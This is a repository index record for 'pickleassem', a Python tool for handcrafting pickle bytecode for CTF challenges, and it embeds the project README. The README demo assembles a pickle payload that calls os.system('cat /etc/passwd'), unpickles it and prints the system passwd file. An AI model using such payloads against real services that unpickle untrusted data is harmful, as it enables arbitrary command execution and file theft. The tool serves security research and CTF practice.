{"id":15287467,"url":"https://github.com/gousaiyang/pickleassem","last_synced_at":"2025-04-13T05:32:33.706Z","repository":{"id":57452509,"uuid":"229147105","full_name":"gousaiyang/pickleassem","owner":"gousaiyang","description":"A simple pickle assembler to make handcrafting pickle bytecode easier.","archived":false,"fork":false,"pushed_at":"2021-04-16T00:36:55.000Z","size":43,"stargazers_count":16,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-03-26T22:11:54.085Z","etag":null,"topics":["assembler","bytecode","ctf","exploit","pickle","security","security-tools"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/gousaiyang.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-12-19T22:14:06.000Z","updated_at":"2024-07-02T14:27:32.000Z","dependencies_parsed_at":"2022-09-02T10:10:53.292Z","dependency_job_id":null,"html_url":"https://github.com/gousaiyang/pickleassem","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gousaiyang%2Fpickleassem","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gousaiyang%2Fpickleassem/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gousaiyang%2Fpickleassem/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gousaiyang%2Fpickleassem/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/gousaiyang","download_url":"https://codeload.github.com/gousaiyang/pickleassem/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248670465,"owners_count":21142896,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["assembler","bytecode","ctf","exploit","pickle","security","security-tools"],"created_at":"2024-09-30T15:28:15.559Z","updated_at":"2025-04-13T05:32:33.673Z","avatar_url":"https://github.com/gousaiyang.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# pickleassem\r\n\r\n[![PyPI - Downloads](https://pepy.tech/badge/pickleassem)](https://pepy.tech/count/pickleassem)\r\n[![PyPI - Version](https://img.shields.io/pypi/v/pickleassem.svg)](https://pypi.org/project/pickleassem)\r\n[![PyPI - Python Version](https://img.shields.io/pypi/pyversions/pickleassem.svg)](https://pypi.org/project/pickleassem)\r\n\r\n[![GitHub Actions - Status](https://github.com/gousaiyang/pickleassem/workflows/Build/badge.svg)](https://github.com/gousaiyang/pickleassem/actions?query=workflow%3ABuild)\r\n[![Codecov - Coverage](https://codecov.io/gh/gousaiyang/pickleassem/branch/master/graph/badge.svg)](https://codecov.io/gh/gousaiyang/pickleassem)\r\n\r\nA simple pickle assembler to make handcrafting pickle bytecode easier.\r\n\r\nThis is useful for CTF challenges like [pyshv in Balsn CTF 2019](https://ctftime.org/task/9386).\r\n\r\n## Demo\r\n\r\n```python\r\nimport pickle\r\nimport pickletools\r\n\r\nfrom pickleassem import PickleAssembler\r\n\r\npa = PickleAssembler(proto=4)\r\npa.push_mark()\r\npa.util_push('cat /etc/passwd')\r\npa.build_inst('os', 'system')\r\npayload = pa.assemble()\r\nassert b'R' not in payload\r\nprint(payload)\r\npickletools.dis(payload, annotate=1)\r\npickle.loads(payload)\r\n```\r\n\r\nOutput:\r\n\r\n```\r\nb'\\x80\\x04(\\x8c\\x0fcat /etc/passwdios\\nsystem\\n.'\r\n    0: \\x80 PROTO      4 Protocol version indicator.\r\n    2: (    MARK         Push markobject onto the stack.\r\n    3: \\x8c     SHORT_BINUNICODE 'cat /etc/passwd' Push a Python Unicode string object.\r\n   20: i        INST       'os system' (MARK at 2) Build a class instance.\r\n   31: .    STOP                                   Stop the unpickling machine.\r\nhighest protocol among opcodes = 4\r\nroot:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\n...\r\n```\r\n\r\n## Installation\r\n\r\nInstall with pip: `pip install -U pickleassem`\r\n\r\n## Documentation\r\n\r\nJust refer to the source code. Each method of `PickleAssembler` whose name begins with `push`, `build`, `pop` or `memo` corresponds to a pickle opcode. Methods whose name begins with `util` are higher-level utility functions. `append_raw` can be used to insert arbitrary raw opcode.\r\n\r\nThe following opcodes and corresponding features are not implemented: `PERSID`, `BINPERSID`, `EXT1`, `EXT2`, `EXT4`, `FRAME`, `NEXT_BUFFER`, `READONLY_BUFFER`.\r\n\r\n## See Also\r\n\r\nOther tools for pickle exploit:\r\n\r\n- `anapickle`: [slides](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf), [repo](https://github.com/sensepost/anapickle)\r\n- [`pwnypack.pickle`](https://github.com/edibledinos/pwnypack/blob/master/pwnypack/pickle.py)\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgousaiyang%2Fpickleassem","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgousaiyang%2Fpickleassem","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgousaiyang%2Fpickleassem/lists"}